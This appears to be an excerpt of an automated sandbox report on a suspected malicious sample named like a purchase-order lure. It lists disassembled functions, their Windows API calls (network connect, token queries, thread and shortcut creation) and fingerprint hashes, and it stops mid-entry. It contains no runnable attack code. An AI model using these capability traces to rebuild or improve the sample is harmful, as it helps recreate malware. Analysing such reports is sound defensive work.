                        Function 00309122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0030ACD3: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0030ACF5
                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00309160
                        • WSAGetLastError.WSOCK32(00000000), ref: 0030916F
                        • connect.WSOCK32(00000000,?,00000010), ref: 0030918B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorLastconnectinet_addrsocket
                        • String ID:
                        • API String ID: 3701255441-0
                        • Opcode ID: 7e4bac9e9049c2c9fb03b43485e32895d1ae8233d3c88fd660539a13ea68f1a7
                        • Instruction ID: 4c2ea6e5ef4a6d4b1087d9eb27c821f69c4b5684cb527fedeedb6b49252933fa
                        • Opcode Fuzzy Hash: 7e4bac9e9049c2c9fb03b43485e32895d1ae8233d3c88fd660539a13ea68f1a7
                        • Instruction Fuzzy Hash: 98219D313102119FDB05AF68DC99F6EB7ADEF48764F05851AF916AB3E2CA70EC018B51
                        Function 003089AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(00000000), ref: 003089CE
                        • GetForegroundWindow.USER32 ref: 003089E5
                        • GetDC.USER32(00000000), ref: 00308A21
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00308A2D
                        • ReleaseDC.USER32(00000000,00000003), ref: 00308A68
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: a0f59baecfb39ee4dc57c175e4f42198ff905496e73838293623f92fa5a644d4
                        • Instruction ID: 0523655270a8e743395475d9f1eac9690b1daea82faac92f05f262922bd61e00
                        • Opcode Fuzzy Hash: a0f59baecfb39ee4dc57c175e4f42198ff905496e73838293623f92fa5a644d4
                        • Instruction Fuzzy Hash: E921A175A00204AFDB01EF75DC95AAABBF9EF48340F058478E94A97351CB70AC00CB50
                        Function 002CB58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002CB5EB
                        • SelectObject.GDI32(?,00000000), ref: 002CB5FA
                        • BeginPath.GDI32(?), ref: 002CB611
                        • SelectObject.GDI32(?,00000000), ref: 002CB63B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: 343155dffed958b7d4d0ba4f4dd80201863f332df43e5e292a37a51a45e9364d
                        • Instruction ID: 1d141cabe2abc8c994f9f0f9365c2b95718843398b78dd817863bb5ca84b1271
                        • Opcode Fuzzy Hash: 343155dffed958b7d4d0ba4f4dd80201863f332df43e5e292a37a51a45e9364d
                        • Instruction Fuzzy Hash: A7218072820345FFDB239F19EC86BA97BEDFB04355F24026AE459A21A0C37448E1CF52
                        Function 002D2E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                        Download Yara Rule
                        APIs
                        • __calloc_crt.LIBCMT ref: 002D2E81
                        • CreateThread.KERNEL32(?,?,002D2FB7,00000000,?,?), ref: 002D2EC5
                        • GetLastError.KERNEL32 ref: 002D2ECF
                        • _free.LIBCMT ref: 002D2ED8
                        • __dosmaperr.LIBCMT ref: 002D2EE3
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                        • String ID:
                        • API String ID: 2664167353-0
                        • Opcode ID: 21f0132995791f51a1b314b2812e3d91093616a437778f6842aba0eae9f520bb
                        • Instruction ID: 5a311e7c254a88eccc0d928b3119f80bf140868d96595d3d4056f23e8013d975
                        • Opcode Fuzzy Hash: 21f0132995791f51a1b314b2812e3d91093616a437778f6842aba0eae9f520bb
                        • Instruction Fuzzy Hash: 39110432124306EFD721BFA5AC41DAB7BA8EF15770B10042BFA14C6391EB31DC249BA0
                        Function 002EB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 002EB903
                        • GetLastError.KERNEL32(?,002EB3CB,?,?,?), ref: 002EB90D
                        • GetProcessHeap.KERNEL32(00000008,?,?,002EB3CB,?,?,?), ref: 002EB91C
                        • HeapAlloc.KERNEL32(00000000,?,002EB3CB,?,?,?), ref: 002EB923
                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 002EB93A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 0d355020de97ff3358ec299cb0e8d7ce41f7eaaca6084714d051e5911de649e3
                        • Instruction ID: d2627465826dfaa6120d03eea67824b12d7a740b4fcedb29e93da8c982dc825d
                        • Opcode Fuzzy Hash: 0d355020de97ff3358ec299cb0e8d7ce41f7eaaca6084714d051e5911de649e3
                        • Instruction Fuzzy Hash: 44016971651249BFDB124FA6ECC9D6B3BADEF8A764F500029FA46C2260DB718C50DA60
                        Function 002F8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F8371
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F837F
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002F8387
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002F8391
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002F83CD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: a91723d02ec42874ebb117093a666ba34cd6f5ca024b0307692162de4021e142
                        • Instruction ID: 3511261154743792f67c2c2db1dc3eb5427ef7387786be028849e8c348e53280
                        • Opcode Fuzzy Hash: a91723d02ec42874ebb117093a666ba34cd6f5ca024b0307692162de4021e142
                        • Instruction Fuzzy Hash: 81012D71D1061DDBDF01AFA4ED88AEEFB7CFB08B41F0104A5E641B2160DF70956087A1
                        Function 002EA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32 ref: 002EA874
                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 002EA88F
                        • lstrcmpiW.KERNEL32(?,00000000), ref: 002EA89D
                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002EA8AD
                        • CLSIDFromString.OLE32(?,?), ref: 002EA8B9
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: f9efff15e6ed5273a231eacc39f75800319399713e3e6a03e1d802985f03241f
                        • Instruction ID: a56e9749d8b79c327488a4edf5848976e2a5736abf171d0f69f1320dc42e4c12
                        • Opcode Fuzzy Hash: f9efff15e6ed5273a231eacc39f75800319399713e3e6a03e1d802985f03241f
                        • Instruction Fuzzy Hash: 8401AD76611205BFEB128F6AEC84BAABBFDEF443A1F104024F901D6210D770ED518BA2
                        Function 002EB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002EB7A5
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002EB7AF
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002EB7BE
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002EB7C5
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002EB7DB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 2d95a716a6324b52bbe6b6bdba774e34e959457347b46cc6e0d9c8ace2640ec4
                        • Instruction ID: 0f0a72e352511a47b0d4b0ced46a5ca0e45bf197c3055f1ad677203552c6a882
                        • Opcode Fuzzy Hash: 2d95a716a6324b52bbe6b6bdba774e34e959457347b46cc6e0d9c8ace2640ec4
                        • Instruction Fuzzy Hash: 7EF0AF362902456FEB120FA5ACC8E677BACFF86B55F400019F941CB150CB70DC118A60
                        Function 002EB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002EB806
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002EB810
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB81F
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB826
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002EB83C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: eea2c87cfa99f4cdb9a818355810f8b43861d34bc9c228d47543ac5c7c323eb3
                        • Instruction ID: cfa7b4ca7a5f51754cd7e031c5b1677bcd454d559721c9d18cc2842548db7500
                        • Opcode Fuzzy Hash: eea2c87cfa99f4cdb9a818355810f8b43861d34bc9c228d47543ac5c7c323eb3
                        • Instruction Fuzzy Hash: 5CF04975250205AFEB225FA6FCC8E6B3B6CFF4AB64F000029F941C7250CB60DC61CA60
                        Function 002EFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 002EFA8F
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 002EFAA6
                        • MessageBeep.USER32(00000000), ref: 002EFABE
                        • KillTimer.USER32(?,0000040A), ref: 002EFADA
                        • EndDialog.USER32(?,00000001), ref: 002EFAF4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                        • String ID:
                        • API String ID: 3741023627-0
                        • Opcode ID: d686d2f6d34964ecc6c4be85bd3cbc0074acfcabf7e303392a46bd47fde17826
                        • Instruction ID: 1e199310823b1fe967f662116f3065fcb82b8507cd6d6e135085a2238378d4e7
                        • Opcode Fuzzy Hash: d686d2f6d34964ecc6c4be85bd3cbc0074acfcabf7e303392a46bd47fde17826
                        • Instruction Fuzzy Hash: 0D018631550745ABEB619F11EE8EBD677BCBF00705F440279B187A91E1DBF0A9548A40
                        Function 002CB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                        Download Yara Rule
                        APIs
                        • EndPath.GDI32(?), ref: 002CB526
                        • StrokeAndFillPath.GDI32(?,?,0032F583,00000000,?), ref: 002CB542
                        • SelectObject.GDI32(?,00000000), ref: 002CB555
                        • DeleteObject.GDI32 ref: 002CB568
                        • StrokePath.GDI32(?), ref: 002CB583
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Path$ObjectStroke$DeleteFillSelect
                        • String ID:
                        • API String ID: 2625713937-0
                        • Opcode ID: 2711e92c4aa28e5a6e252cb431f4240443e35944c61d91e24dbb383a0c3e03ce
                        • Instruction ID: 570e5b428c3862ca11fac3e66129e2cb5a22b63f19867db9637d5fb4131c2583
                        • Opcode Fuzzy Hash: 2711e92c4aa28e5a6e252cb431f4240443e35944c61d91e24dbb383a0c3e03ce
                        • Instruction Fuzzy Hash: 1CF0C432050205ABDB275F29ED49B643FE9AB01362F588258E4A9551F0C73589E6DF11
                        Function 002FFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 002FFAB2
                        • CoCreateInstance.OLE32(0033DA7C,00000000,00000001,0033D8EC,?), ref: 002FFACA
                          • Part of subcall function 002BCAEE: _memmove.LIBCMT ref: 002BCB2F
                        • CoUninitialize.OLE32 ref: 002FFD2D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateInitializeInstanceUninitialize_memmove
                        • String ID: .lnk
                        • API String ID: 2683427295-24824748
                        • Opcode ID: 28e2d88f0584c889eb246e500e146efd0c4b5474ad7e09f3112857ed608dfd4b
                        • Instruction ID: 69dbc99ea404daedbacbe84f2ec49e01c88cc6b197c3cca5c20f229e89b8c90a
                        • Opcode Fuzzy Hash: 28e2d88f0584c889eb246e500e146efd0c4b5474ad7e09f3112857ed608dfd4b
                        • Instruction Fuzzy Hash: 61A16B71114205AFC300EF64C891EABB7EDEF88744F50496DF1959B192EB70EA19CF92
                        Function 002FEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002F78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 002F78CB
                        • CoInitialize.OLE32(00000000), ref: 002FF04D
                        • CoCreateInstance.OLE32(0033DA7C,00000000,00000001,0033D8EC,?), ref: 002FF066
                        • CoUninitialize.OLE32 ref: 002FF083
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                        • String ID: .lnk
                        • API String ID: 2126378814-24824748
                        • Opcode ID: 2659ee0880295f990a4716ef86d161880c3862792d7dcd1231233f39281d80cd
                        • Instruction ID: 0ed379f03de46158cd8d46c85fe87b4693d542f208abc3d82d2c08a6a72f1232
                        • Opcode Fuzzy Hash: 2659ee0880295f990a4716ef86d161880c3862792d7dcd1231233f39281d80cd
                        • Instruction Fuzzy Hash: A8A157356143069FC710DF14C984D6ABBE9BF88360F1489A8F99A9B3A1CB31ED45CF91
                        Function 002D3EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                        Download Yara Rule
                        APIs
                        • __startOneArgErrorHandling.LIBCMT ref: 002D3F7D
                          • Part of subcall function 002DEE80: __87except.LIBCMT ref: 002DEEBB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ErrorHandling__87except__start
                        • String ID: pow
                        • API String ID: 2905807303-2276729525
                        • Opcode ID: 4c7694a540dbb92d97039e349b9840213725aeb23c8493f1753a406c1263c7ad
                        • Instruction ID: 6c77c31318cd9ebe95fa20c92c4e83883476bea4d36746f64d582951bff2eb02
                        • Opcode Fuzzy Hash: 4c7694a540dbb92d97039e349b9840213725aeb23c8493f1753a406c1263c7ad
                        • Instruction Fuzzy Hash: 2D516A21D382078ADB15BF14C94137A7BA89B40711F208D2BF4D68A7E9DB348DB49A47
                        Function 002CDA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: #$+
                        • API String ID: 0-2552117581
                        • Opcode ID: 2c754e84f0483ac1df36d29e8c96ce9d00750fbc00509afd5d516a39bc1e88b1
                        • Instruction ID: 4bed2175b854308e72835f04ed26fc2e5631d851bc0cd77fa3eceac91f42b0aa
                        • Opcode Fuzzy Hash: 2c754e84f0483ac1df36d29e8c96ce9d00750fbc00509afd5d516a39bc1e88b1
                        • Instruction Fuzzy Hash: 9C513334104366CFDF16EF69D480BFA7BA4EF1A314F16416AF8819B2A0D7709C62CB60
                        Function 002F503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                        Download Yara Rule
                        APIs
                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0034DC40,?,0000000F,0000000C,00000016,0034DC40,?), ref: 002F507B
                          • Part of subcall function 002B84A6: __swprintf.LIBCMT ref: 002B84E5
                          • Part of subcall function 002B84A6: __itow.LIBCMT ref: 002B8519
                          • Part of subcall function 002BB8A7: _memmove.LIBCMT ref: 002BB8FB
                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 002F50FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                        • String ID: REMOVE$THIS
                        • API String ID: 2528338962-776492005
                        • Opcode ID: 5c4831b82addd50db9ef4de6079ee42348f1ae4cad48b61a3b2c64bfbda49d68
